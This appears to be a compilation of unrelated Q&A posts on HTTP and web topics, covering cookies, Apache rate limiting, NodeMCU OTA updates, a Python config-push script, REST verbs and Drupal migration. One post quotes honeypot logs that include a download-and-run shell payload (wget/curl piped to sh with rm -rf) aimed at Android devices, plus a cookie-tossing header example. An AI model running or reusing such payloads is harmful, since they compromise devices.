http – What can you do with supercookies on a subdomain to harm the domain?

When you search Google for supercookies, the top results are VPN services saying that supercookies are used by ISPs to track users. The Wikipedia article on supercookies says nothing about HTTP headers or what exactly supercookies are.

I’m interested in what a subdomain can do to harm the parent domain. Are supercookies the same as HSTS supercookies, as described in the question What are HSTS Super Cookies?

While discussing this, someone suggested to me that a domain which acts like an umbrella for different subdomains should be reported, otherwise a subdomain can steal login cookies. This seems unlikely to me, because in one article (from some VPN company) I read that supercookies are not actually cookies, only HTTP headers.

So can someone explain what exactly supercookies are, and what a potential attacker can do with them to harm the domain? What attack vectors does a malicious actor have with supercookies?
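For what it’s worth, the classic subdomain-harms-domain scenario involves ordinary cookies rather than supercookies: a compromised subdomain can set a cookie scoped to the parent domain. A sketch of such a response header (example.com is a placeholder):

```http
HTTP/1.1 200 OK
Set-Cookie: session=attacker-chosen-value; Domain=example.com; Path=/
```

Because of the broad Domain attribute, browsers will send this cookie to example.com and all of its subdomains, which lets the subdomain overwrite or fixate the parent site’s session cookie (sometimes called "cookie tossing").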

Implement ‘Domain’, ‘HTTP Only’ and ‘Secure’ cookie attributes

How can I implement the ‘Domain’, ‘HTTP Only’ and ‘Secure’ cookie attributes in a SharePoint 2013 internet-facing web application? Should this implementation be done in the web.config file of the web application?
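For reference, in a plain ASP.NET web.config (which SharePoint 2013 web applications are built on), these attributes map to the httpCookies element. A minimal sketch, with the domain value as a placeholder; note that SharePoint manages some of its own cookies, so test on a non-production farm first:

```xml
<configuration>
  <system.web>
    <!-- HttpOnly and Secure flags for cookies emitted by ASP.NET; "domain" sets the Domain attribute -->
    <httpCookies httpOnlyCookies="true" requireSSL="true" domain=".contoso.com" />
  </system.web>
</configuration>
```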

security – Can I use rate-limiting with HTTP basic authentication in Apache?

So I’m running a few popular web applications on my server. I want these to be reachable from any computer without creating too many vulnerabilities.

I am using Apache 2.4.29 as my HTTP server. My current idea for hiding potential security vulnerabilities in my applications from attackers is to enable HTTP basic authentication (AuthType Basic) for the relevant virtual hosts as an additional security layer. Of course, I’m only allowing SSL connections.

Now this is all quite easy to accomplish. But my question is this: how can I best avoid brute force style attacks with HTTP basic authentication? I.e., how can I enable rate limiting?

My current plan is something like this:

Since I’m using ufw (Uncomplicated Firewall) to limit SSH connections, I thought I could do the same on a specific port I use for HTTPS. However, I see two problems with this:

  1. Can’t an attacker just use Connection: Keep-Alive and keep trying different passwords without even reconnecting? So limiting incoming connections wouldn’t be of any use here.
  2. If I disabled Connection: Keep-Alive somehow, I guess I would run into trouble with the underlying web applications, since they would require a lot of individual connections so the browser can retrieve additional files.

It would be perfect if I could instruct Apache to only keep the connection going for authenticated users and drop it after failed attempts. Is there a way to do this? I am actually not sure what the default behavior is, and I don’t understand enough about HTTP to easily test this.
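One common pattern (not Apache-native, and a sketch only; the log path is an assumption that depends on your distribution) is to let fail2ban watch the Apache error log for failed basic-auth attempts using its bundled apache-auth filter, and ban repeat offenders at the firewall:

```ini
# /etc/fail2ban/jail.local
[apache-auth]
enabled  = true
port     = http,https
logpath  = /var/log/apache2/error.log
maxretry = 5
bantime  = 600
```

Banning at the IP level also sidesteps the Keep-Alive concern, since new packets from a banned address are dropped regardless of whether the attacker reuses an existing connection.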

arduino – NodeMCU fails on OTA updates over http

I am trying to update a NodeMCU with an OLED display via OTA, using the following code:

#include <ESP8266WiFi.h>
#include <ESP8266WiFiMulti.h>

#include <ESP8266HTTPClient.h>
#include <ESP8266httpUpdate.h>

ESP8266WiFiMulti WiFiMulti;

int ledState = LOW;

unsigned long previousMillis = 0;
const long interval = 2000;

int count = 0;

void setup() {
  Serial.begin(115200);
  pinMode(LED_BUILTIN, OUTPUT);

  for (uint8_t t = 4; t > 0; t--) {
    Serial.printf("(SETUP) WAIT %d...\n", t);
    Serial.flush();
    delay(1000);
  }

  WiFiMulti.addAP("SSID", "PASS");
}

void ota_update() {
  // wait for WiFi connection
  if ((WiFiMulti.run() == WL_CONNECTED)) {

    t_httpUpdate_return ret = ESPhttpUpdate.update("");

    switch (ret) {
      case HTTP_UPDATE_FAILED:
        Serial.printf("HTTP_UPDATE_FAILED Error (%d): %s\n", ESPhttpUpdate.getLastError(), ESPhttpUpdate.getLastErrorString().c_str());
        break;

      case HTTP_UPDATE_NO_UPDATES:
        Serial.println("HTTP_UPDATE_NO_UPDATES");
        break;

      case HTTP_UPDATE_OK:
        Serial.println("HTTP_UPDATE_OK");
        break;
    }
  }
}

void loop() {

  unsigned long currentMillis = millis();

  if (currentMillis - previousMillis >= interval) {

    previousMillis = currentMillis;

    if (ledState == LOW)
      ledState = HIGH;
    else
      ledState = LOW;

    digitalWrite(LED_BUILTIN, ledState);
    Serial.println("Blink LED at 2 seconds interval");

    count = count + 1;
    if (count > 25) ota_update();
  }
}

but when I load the sketch, it shows the error:

 ets Jan  8 2013,rst cause:2, boot mode:(3,0)

load 0x4010f000, len 3656, room 16 
tail 8
chksum 0x0c
csum 0x0c
e: ets Jan  8 2013,rst cause:3, boot mode:(3,0)

My understanding is that the first boot is needed to load the new sketch.

I also uploaded the same sketch to another NodeMCU without the display, and it works without problems.

The board information is:

Flash real id: 00164020
Flash real size: 4194304 bytes
Flash ide size: 4194304 bytes
Flash ide speed: 40000000 Hz
Flash ide mode: DIO
Flash Chip configuration ok.

Board that produces the error:
Nodemcu Display

Board without the error:

HTTP Header Document Policy vs. Permissions-Policy/Feature-Policy

I’m checking the options to harden my web app by setting the appropriate HTTP headers.

Besides the Content Security Policy (CSP) there are two other approaches: Document Policy and Permissions-Policy (Feature-Policy).

I’ve checked the W3C Relation to Feature Policy documentation, but still can’t get a clear answer on whether I need to set both policies, Document and Permissions, or whether that is overkill and setting just Permissions-Policy is enough.
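For comparison, the two headers use different syntaxes and cover different configuration points. A sketch of setting both on a response (the feature names here are illustrative examples, not a recommendation):

```http
Permissions-Policy: geolocation=(), camera=(self)
Document-Policy: force-load-at-top
```

Permissions-Policy controls delegation of powerful features to the document and its frames, while Document Policy configures per-document behaviors, so the overlap between them is smaller than the names suggest.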

P.S. Feel free to move this question to SE’s Web Applications or Stack Overflow, if it doesn’t fit this site well.

beginner – Execute a bunch of HTTP API calls using Python

I am working on a project where I need to work with HTTP apis and call them using Python. Below is what I need to do:

  • Take a few input parameters, like environmentName, instanceName and configName.
  • Call a GET api on a service. Get the JSON data and compare the configName it already has vs. the one you want to update from the command line.
  • If the config is the same, don’t do anything and return with a message.
  • But if the config is different, POST new JSON data containing the new configName passed from the command line to the service using its HTTP api. In this there are two things:
    • We make a new JSON with the new configName in it, along with one more key, action, whose value is download. After successfully posting this new JSON, we call another api (verifyApi) to verify whether all machines have downloaded that config successfully. If they downloaded it successfully, we move to the next step; otherwise we fail and return.
    • If all machines downloaded it successfully, we change the action key to verify in the same JSON and post it again. After successfully posting this new JSON, we call the same verifyApi to make sure all machines have verified successfully.

Once everything is successful, return; otherwise fail. Below is my code, which does the job:

import requests
import json
import sys

# define all constants
# NOTE: endpoint, config_path, catalog_path, status_path and raw are
# assumed to be defined elsewhere in the real script.
actions = ('download', 'verify')

def update(url, payload):
    """Make a PUT api call to update the service with the new json config."""
    try:
        r = requests.put(url, data=payload, headers={'Content-type': 'application/json'})
        r.raise_for_status()  # turn 4xx/5xx responses into HTTPError
        return True
    except requests.exceptions.HTTPError as errh:
        print("Http Error:", errh)
    except requests.exceptions.ConnectionError as errc:
        print("Error Connecting:", errc)
    except requests.exceptions.Timeout as errt:
        print("Timeout Error:", errt)
    except requests.exceptions.RequestException as err:
        print("Oops: Something Else", err)

    return False

def verify(environment, instance, config, action):
    """Get the list of all ipAddresses for that instance in that environment,
    then check whether each machine from that list has downloaded (or verified,
    depending on 'action') the config successfully. If successful at the end,
    print out a message."""
    flag = True
    catalog_url = endpoint.format(environment) + catalog_path.format(instance)
    response = requests.get(catalog_url)
    url = endpoint.format(environment) + status_path.format(instance) + raw
    json_array = response.json()
    count = 0
    for x in json_array:
        ip = x['Address']
        r = requests.get(url.format(ip))
        data = r.json()
        if action == 'download' and "isDownloaded" in data and data['isDownloaded'] and "currentCfg" in data and data['currentCfg'] == config:
            count += 1
        elif action == 'verify' and "activeCfg" in data and data['activeCfg'] == config:
            count += 1
        else:
            flag = False  # set to False if the two checks above fail
            print("failed to " + action + " on " + ip)

    if flag and action == 'download':
        print("downloaded successfully on all " + str(count) + " machines")
    elif flag and action == 'verify':
        print("verified successfully on all " + str(count) + " machines")

    return flag

def main():
    # capture inputs from command line
    environment = sys.argv[1]
    instance = sys.argv[2]
    new_config = sys.argv[3]

    # make url for the get api to verify whether configs are the same or not,
    # as mentioned in point 1.
    url = endpoint.format(environment) + config_path.format(instance)
    response = requests.get(url + raw)
    data = json.loads(response.content)
    remote_config = data['remoteConfig']
    # compare remote_config in the json with the config passed from the command line
    if remote_config == new_config:
        print("cannot push same config")
        return

    # config is different
    data['remoteConfig'] = new_config
    # now for each action, update the json and then verify whether that action completed successfully
    for action in actions:
        data['action'] = action
        if update(url, json.dumps(data)):
            if not verify(environment, instance, new_config, action):
                print(action + " action failed")
                return
        else:
            print("failed to update")
            return
    print("config pushed successfully!!")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\nCaught ctrl+c, exiting")

Problem Statement

The above code works fine, so I’m opting for a code review to see if there is a better way to do these things efficiently. I’m also sure it can be rewritten much more cleanly; I’m relatively new to Python, so I may have made a lot of mistakes in designing it. Given that this code will run in production, I’d like to see what can be done to improve it.

The idea is something like this when I run it from the command line.

If everything is successful then it should look like this:

python dev master-instace test-config-123.tgz
downloaded successfully on all 10 machines
verified successfully on all 10 machines
config pushed successfully!!

In case of download failure:

python dev master-instace test-config-123.tgz
failed to download on
failed to download on
download action failed

In case of verify failure:

python dev master-instace test-config-123.tgz
failed to verify on
failed to verify on
verify action failed

http – Intensive 568 (ms-shuttle) port scan/exploit/hacking attempts

Recently I wanted to play a bit with TCP/UDP networking (and a custom HTTP server implementation) in C#, and found out that I’m getting requests from totally unknown actors, such as this one:

   FROM: (::ffff:
POST /cgi-bin/ViewLog.asp HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded


Then I decided to go further and set a mass port trap from 90 to 10000, and found that the most intensive one is port 568, which is registered as the ms-shuttle/smb port. Here are some samples:

(25.11.2020 21:53:46)
   FROM: (::ffff:
| UTF8:
 &�     Cookie: mstshash=hello
(25.11.2020 21:53:33)
   FROM: (::ffff: // <= this dude was spamming me for like 2-4 hrs
| UTF8:
 *�     Cookie: mstshash=Administr
(25.11.2020 16:07:01)
   FROM: (::ffff:
| UTF8:
 X      �  �  ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget; sh wget; busybox wget; sh bwget; busybox curl > bcurl; sh bcurl; curl > curl; sh curl  

I tried to search for some info about this port and the knock-knocks on it, but didn’t succeed.
My log file size now exceeds 2 MB, so I wonder: why is this happening? Why is this port being bombarded so actively? And what, if anything, should I do to stop receiving those requests?

rest – How to map “mv” operation to HTTP verbs?

In designing a RESTful API, the problem arises of how best to allow resources to be moved between collections.

Renaming a resource could be done using PATCH, but this is not the same thing as moving the resource between collections. It is also not clear whether it is the resource or the collection that should be patched. Does it make sense to PATCH the resource path of an object in the API if the resource path is not a direct attribute (content) of the resource?

Clearly a DELETE/POST sequence could be used, but this involves multiple operations and is not atomic. RFC 2616 states:

The PUT method requests that the enclosed entity be stored under the supplied Request-URI.
If the Request-URI refers to an already existing resource, the enclosed entity SHOULD
be considered as a modified version of the one residing on the origin server.

Hence, either the resource is replaced in situ or it is created.

Is there a RESTful way to implement this while maintaining atomicity of the operation?
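For comparison, WebDAV (RFC 4918) already defines an atomic MOVE method for exactly this case; it is not one of the core HTTP verbs, but it is a registered method that some APIs borrow. A sketch (host and paths are placeholders):

```http
MOVE /collections/a/item42 HTTP/1.1
Host: api.example.com
Destination: /collections/b/item42
```

The server performs the move as a single operation, so the client never observes a state where the resource exists in both collections or in neither.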

how can I correct some urls that are missing http when migrating from d7 to d8?

I am migrating a link field from d7 to d8 using the code below, but it fails when some urls in the source are missing the "http://" part, with this error: The URI ‘’ is invalid. You must use a valid URI scheme. How can I process the source so that http:// is added if it is missing?

plugin: iterator
source: field_website_url
process:
  uri: url
  title: title
  options: attributes
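One possible approach (a sketch only; mymodule_fix_scheme is a hypothetical custom PHP function you would write in your module, returning the value with http:// prepended when no scheme is present) is to run the source value through the callback process plugin before it becomes the uri:

```yaml
plugin: iterator
source: field_website_url
process:
  uri:
    plugin: callback
    callable: mymodule_fix_scheme
    source: url
  title: title
  options: attributes
```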

apache http server – Throttled speed to specific IP address from within home WiFi only

I am experiencing a weird problem where:

  • Accessing my own dedicated server at a hosting provider in France is slow between the hours of 6pm and 10pm.
  • Just accessing this particular IP is slow, not everything else
  • Accessing the IP from my phone for example is fine

I called my ISP and they say they don’t block or throttle anything. I also reset my router completely but the problem persists.

I can download TO my server with no problem. I also contacted my server provider; they ran some tests and they get full speed.

What can I do? How can I find out what is causing this issue?